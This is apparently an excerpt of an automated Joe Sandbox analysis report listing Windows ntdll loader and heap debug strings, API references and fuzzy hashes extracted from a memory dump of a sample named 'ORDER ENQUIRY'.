                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                          • API String ID: 0-2515994595
                                                                                                                                                                          • Opcode ID: 620a987057407e7d129268f9010985e6604f47d844f3b0aeaa755a571b7e79f1
                                                                                                                                                                          • Instruction ID: d518d478a49a2db48b77fe84cce2bb5907f080492001ef4c1ab78992bb24b833
                                                                                                                                                                          • Opcode Fuzzy Hash: 620a987057407e7d129268f9010985e6604f47d844f3b0aeaa755a571b7e79f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B51F0715143019BD36ADF5A8984BABBBECFF94640F240A5DFE99C3280E770D644CB92
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                          • API String ID: 0-1700792311
                                                                                                                                                                          • Opcode ID: d8ff78b67826fe78a7f35f0db725fd33a6c9c2ed11703d1ab96b007368fd511e
                                                                                                                                                                          • Instruction ID: 0265cd7486247a2152f62e8cc74f61ea8c132ff29032e3f5b653fdac92c3ece5
                                                                                                                                                                          • Opcode Fuzzy Hash: d8ff78b67826fe78a7f35f0db725fd33a6c9c2ed11703d1ab96b007368fd511e
                                                                                                                                                                          • Instruction Fuzzy Hash: 06D11531500686EFDB2AEF6AC441AAEBFF5FF69700F488099F4459B252D778D981CB10
                                                                                                                                                                          Strings
                                                                                                                                                                          • VerifierFlags, xrefs: 01B38C50
                                                                                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01B38B8F
                                                                                                                                                                          • VerifierDlls, xrefs: 01B38CBD
                                                                                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B38A67
                                                                                                                                                                          • VerifierDebug, xrefs: 01B38CA5
                                                                                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B38A3D
                                                                                                                                                                          • HandleTraces, xrefs: 01B38C8F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                          • API String ID: 0-3223716464
                                                                                                                                                                          • Opcode ID: 79d4faddbfd152349b75189b04c74ed829848d36b2356cb6a18eb284534c44c1
                                                                                                                                                                          • Instruction ID: 34a83bab09e5b6e7d08d43d4aceedb4e1633cce2aa849bbb424dcb7761277f42
                                                                                                                                                                          • Opcode Fuzzy Hash: 79d4faddbfd152349b75189b04c74ed829848d36b2356cb6a18eb284534c44c1
                                                                                                                                                                          • Instruction Fuzzy Hash: F59166B2644706AFDB39DF28C981B5BB7E4EBC4714F84069CFA41AB240D770AD21C792
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                          • API String ID: 0-1109411897
                                                                                                                                                                          • Opcode ID: 649592f98763dab7c4dcfe41883b96b9f3d09a76ea893226f5f281ba38ee17fb
                                                                                                                                                                          • Instruction ID: 19fcfdd4287a9ca16befa4961e6c144986fd120bc95a434b3d18c371a8ed737e
                                                                                                                                                                          • Opcode Fuzzy Hash: 649592f98763dab7c4dcfe41883b96b9f3d09a76ea893226f5f281ba38ee17fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 6EA24774A0566A8FDB68CF18CD887E9BBB9EF45304F5942E9D90DA7255DB309E80CF00
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                          • API String ID: 0-792281065
                                                                                                                                                                          • Opcode ID: 44baf4288e77f99ac86e6da32e6ec9054f345378deec8e498f79a8da390c2f2b
                                                                                                                                                                          • Instruction ID: bcbe62a862b59d2180bc07a6af0a61024f2788692451a125eeb1106942d43ac4
                                                                                                                                                                          • Opcode Fuzzy Hash: 44baf4288e77f99ac86e6da32e6ec9054f345378deec8e498f79a8da390c2f2b
                                                                                                                                                                          • Instruction Fuzzy Hash: B4918970B00325ABEB39DF19D949BAA7FE1FF11B14F5800ADE9086B682D7709845C7D0
                                                                                                                                                                          Strings
                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01B09A11, 01B09A3A
                                                                                                                                                                          • apphelp.dll, xrefs: 01AA6496
                                                                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B099ED
                                                                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B09A01
                                                                                                                                                                          • LdrpInitShimEngine, xrefs: 01B099F4, 01B09A07, 01B09A30
                                                                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B09A2A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                          • API String ID: 0-204845295
                                                                                                                                                                          • Opcode ID: 1bbe356f06e2ef1a05f7ac9ffda2ea42a0d8fcb32be82480f75e268a1caf5ba0
                                                                                                                                                                          • Instruction ID: 24c7db9204d289df548f50240af77ca20acf3abe013093653f5e6cee72ef500c
                                                                                                                                                                          • Opcode Fuzzy Hash: 1bbe356f06e2ef1a05f7ac9ffda2ea42a0d8fcb32be82480f75e268a1caf5ba0
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B51B371208305AFEB25DF24D941FABBBE8FB84748F44491EF5899B1A1D730E944CB92
                                                                                                                                                                          Strings
                                                                                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B281E5
                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01AEC6C3
                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01B28181, 01B281F5
                                                                                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01B28170
                                                                                                                                                                          • LdrpInitializeImportRedirection, xrefs: 01B28177, 01B281EB
                                                                                                                                                                          • LdrpInitializeProcess, xrefs: 01AEC6C4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                          • API String ID: 0-475462383
                                                                                                                                                                          • Opcode ID: 761967bf86c728326a553c05c614d5e29e2b51b0eac8226c00d8b328a1ab7b5f
                                                                                                                                                                          • Instruction ID: d6ea6b91c88468d4e0da7252c19213ae1150195e4b4898ea1285a6b0926c0831
                                                                                                                                                                          • Opcode Fuzzy Hash: 761967bf86c728326a553c05c614d5e29e2b51b0eac8226c00d8b328a1ab7b5f
                                                                                                                                                                          • Instruction Fuzzy Hash: E7312571644716AFC724EF29D946E2BBBE4FF94B20F04055CF945AB295E720EC04CBA2
                                                                                                                                                                          Strings
                                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B22180
                                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B221BF
                                                                                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01B22160, 01B2219A, 01B221BA
                                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01B22165
                                                                                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B2219F
                                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B22178
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                          • API String ID: 0-861424205
                                                                                                                                                                          • Opcode ID: 7101de2dfa77b1b245713e72faf86e4a8281bcf83ede24c4700a10b8a06915bc
                                                                                                                                                                          • Instruction ID: bdb50340630161b4b00d05b7931d022f43b41ecf46eadf3acfee9ccdf347bcbc
                                                                                                                                                                          • Opcode Fuzzy Hash: 7101de2dfa77b1b245713e72faf86e4a8281bcf83ede24c4700a10b8a06915bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 44310836E4022577FB259A9ACC45F6B7AB8EB94B50F1540DAFA04FB140D3709A41C6A1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 01AF2DF0: LdrInitializeThunk.NTDLL ref: 01AF2DFA
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0BA3
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0BB6
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0D60
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0D74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1404860816-0
                                                                                                                                                                          • Opcode ID: 21f0f7c654efcbdd83d2b963af6fe0265c8b3d5436e4652647175de66d904df3
                                                                                                                                                                          • Instruction ID: 028fa1b29acf9f133441dc162b84e955149a7c223fe182ca2ff29db4cba6d232
                                                                                                                                                                          • Opcode Fuzzy Hash: 21f0f7c654efcbdd83d2b963af6fe0265c8b3d5436e4652647175de66d904df3
                                                                                                                                                                          • Instruction Fuzzy Hash: 04423971900715DFDB25CF68C980BAAB7F5FF08314F1445AEEA899B242E770A985CF60
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                          • API String ID: 0-379654539
                                                                                                                                                                          • Opcode ID: e40820eb91d08580b5c4028c83dbaed22996ab218712af37174be5e521c7598e
                                                                                                                                                                          • Instruction ID: 0ef1298a599107e25046501774e31ac52246586feabe5ecb92191fc0bc3c2c2c
                                                                                                                                                                          • Opcode Fuzzy Hash: e40820eb91d08580b5c4028c83dbaed22996ab218712af37174be5e521c7598e
                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC18D74108386CFD715DF68C180BAAB7F8FF84704F0449AAF9958B252E738DA49CB56
                                                                                                                                                                          Strings
                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01AE8421
                                                                                                                                                                          • @, xrefs: 01AE8591
                                                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AE855E
                                                                                                                                                                          • LdrpInitializeProcess, xrefs: 01AE8422
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                          • API String ID: 0-1918872054
                                                                                                                                                                          • Opcode ID: b62cea613e6cb236a2adca9645ecec36cc89b4359656b4d30595771084cb675b
                                                                                                                                                                          • Instruction ID: 10be1afcfa676e30c08e1580992b49a19d70360198f4269157a1102ddd6b86b9
                                                                                                                                                                          • Opcode Fuzzy Hash: b62cea613e6cb236a2adca9645ecec36cc89b4359656b4d30595771084cb675b
                                                                                                                                                                          • Instruction Fuzzy Hash: CC918A71508345AFD721EF65CD85FABBAE8FF88744F40096EFA8892151E738D904CB62
                                                                                                                                                                          Strings
                                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01B221DE
                                                                                                                                                                          • .Local, xrefs: 01AE28D8
                                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B222B6
                                                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B221D9, 01B222B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                          • API String ID: 0-1239276146
                                                                                                                                                                          • Opcode ID: a754534807a8f576ae5fa0843083c73598d2fa5deb663501d5377af6166da0ad
                                                                                                                                                                          • Instruction ID: 41b9cd38bbb41c9327448ff85951b3e54173b00204a8117903076585f0c2e16c
                                                                                                                                                                          • Opcode Fuzzy Hash: a754534807a8f576ae5fa0843083c73598d2fa5deb663501d5377af6166da0ad
                                                                                                                                                                          • Instruction Fuzzy Hash: E2A19031900229DBDB25CF68CC88BA9B7F5BF59354F1541EAE908EB251D7309E84CF90
                                                                                                                                                                          Strings
                                                                                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B23437
                                                                                                                                                                          • RtlDeactivateActivationContext, xrefs: 01B23425, 01B23432, 01B23451
                                                                                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B2342A
                                                                                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B23456
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                          • API String ID: 0-1245972979
                                                                                                                                                                          • Opcode ID: e97de25fb9e1b08841c232e65ee793f09f7bb0657fa08d70d60461230fb7c9a3
                                                                                                                                                                          • Instruction ID: 7f9e41056c95520034ac6a78322ff7cff7315979ce8684d9dcbc074bf7bfc9a2
                                                                                                                                                                          • Opcode Fuzzy Hash: e97de25fb9e1b08841c232e65ee793f09f7bb0657fa08d70d60461230fb7c9a3
                                                                                                                                                                          • Instruction Fuzzy Hash: A06135326007129BDB26CF1DC885B3AB7E9FF88B10F14859DE969DB250C738E845CB91
                                                                                                                                                                          Strings
                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B1106B
                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B10FE5
                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B11028
                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B110AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                          • API String ID: 0-1468400865
                                                                                                                                                                          • Opcode ID: 6374e7927dba5e26128d20dee72a0c4bb6c5ed861385557965edcfe57177f9d0
                                                                                                                                                                          • Instruction ID: 3ce0c515ab8e9ca546556285542678ced423e0123467f3984cf8230ff6b18e71
                                                                                                                                                                          • Opcode Fuzzy Hash: 6374e7927dba5e26128d20dee72a0c4bb6c5ed861385557965edcfe57177f9d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6571CEB1904345AFCB21EF28C8C4B977FA8EF94764F440568F9498B18BD334D598CB92
                                                                                                                                                                          Strings
                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01B1A9A2
                                                                                                                                                                          • apphelp.dll, xrefs: 01AD2462
                                                                                                                                                                          • LdrpDynamicShimModule, xrefs: 01B1A998
                                                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B1A992
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                          • API String ID: 0-176724104
                                                                                                                                                                          • Opcode ID: abf471a03c572d09c22b27ecf8e54ec199fbfe5af1722df12469e15d68119d4b
                                                                                                                                                                          • Instruction ID: 6c6f2e8e16a918f869c2d9f7cd69c2606f060f5154221c592dd193da3c6b6fa4
                                                                                                                                                                          • Opcode Fuzzy Hash: abf471a03c572d09c22b27ecf8e54ec199fbfe5af1722df12469e15d68119d4b
                                                                                                                                                                          • Instruction Fuzzy Hash: 3D3141B1600241ABDB359F6DD882FB9B7F5FB84710F9A405EF90167259C7706981CB40
                                                                                                                                                                          Strings
                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 01AC3255
                                                                                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AC327D
                                                                                                                                                                          • HEAP: , xrefs: 01AC3264
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                          • API String ID: 0-617086771
                                                                                                                                                                          • Opcode ID: 463e40be313ea153ba9de84b766dcc89f1dc1e4069fe845c6502ee8c82ba03b6
                                                                                                                                                                          • Instruction ID: ec4ae44faba70059080ff17738bda45aea2804fd4cd581a0db54e2cc66c323e5
                                                                                                                                                                          • Opcode Fuzzy Hash: 463e40be313ea153ba9de84b766dcc89f1dc1e4069fe845c6502ee8c82ba03b6
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B92AA71A042499FDF25CF68C4407AEBBF1BF48B10F1880AEE959AB352D735A945CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                                                          • Opcode ID: bcd6c068826e00a225233e49a908c2cc9ab7418189744cee145192a75ed894c2
                                                                                                                                                                          • Instruction ID: 5777783f5f7543f0b918c74b946b6a8e9a2ab2d3ef3ae2e23773137608643e5f
                                                                                                                                                                          • Opcode Fuzzy Hash: bcd6c068826e00a225233e49a908c2cc9ab7418189744cee145192a75ed894c2
                                                                                                                                                                          • Instruction Fuzzy Hash: B8F1BE35A00606DFEB2ACF68C984BAAB7B5FF85700F1481ACE5169B355D734E981CB90
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: $@
                                                                                                                                                                          • API String ID: 2994545307-1077428164
                                                                                                                                                                          • Opcode ID: de564b988bfa412e94048501793b17ec862cc9882c8e4a54167d0c8f36a3094d
                                                                                                                                                                          • Instruction ID: b976c7c883098c682a084e60de5978d97745066155d6555b6480483c0bb3baea
                                                                                                                                                                          • Opcode Fuzzy Hash: de564b988bfa412e94048501793b17ec862cc9882c8e4a54167d0c8f36a3094d
                                                                                                                                                                          • Instruction Fuzzy Hash: 03C2A1716087419FDB29CF68C881BABBBE5BF88718F05896DF98AC7241D734D844CB52
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                          • API String ID: 0-2779062949
                                                                                                                                                                          • Opcode ID: 47003fc05d46fb4610a797e292b7623a1b88de91403788f984f75953530a92c2
                                                                                                                                                                          • Instruction ID: a8651221d303d5a507afa2c1b61551b08fdda6f7135133402ceda4ba58795c85
                                                                                                                                                                          • Opcode Fuzzy Hash: 47003fc05d46fb4610a797e292b7623a1b88de91403788f984f75953530a92c2
                                                                                                                                                                          • Instruction Fuzzy Hash: A5A15E719116299BDF32DF64CD88BAABBB8FF44700F1141EAEA09A7250D7359E84CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01B1A121
                                                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 01B1A10F
                                                                                                                                                                          • LdrpCheckModule, xrefs: 01B1A117
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                          • API String ID: 0-161242083
                                                                                                                                                                          • Opcode ID: 94821d92897cf9b4e8f0a6248a257e6e7d76794929f861d8c1ed1b8cadde2e81
                                                                                                                                                                          • Instruction ID: 1e190f685f4efbdc24b38ce3cebdeb3f4cfee794fa8e13999357ce6bf76c2515
                                                                                                                                                                          • Opcode Fuzzy Hash: 94821d92897cf9b4e8f0a6248a257e6e7d76794929f861d8c1ed1b8cadde2e81
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D71F1B0A00606DFDB29DF68CA85ABEB7F4FB48704F59406DE806E7255E734AD41CB40
                                                                                                                                                                          Strings
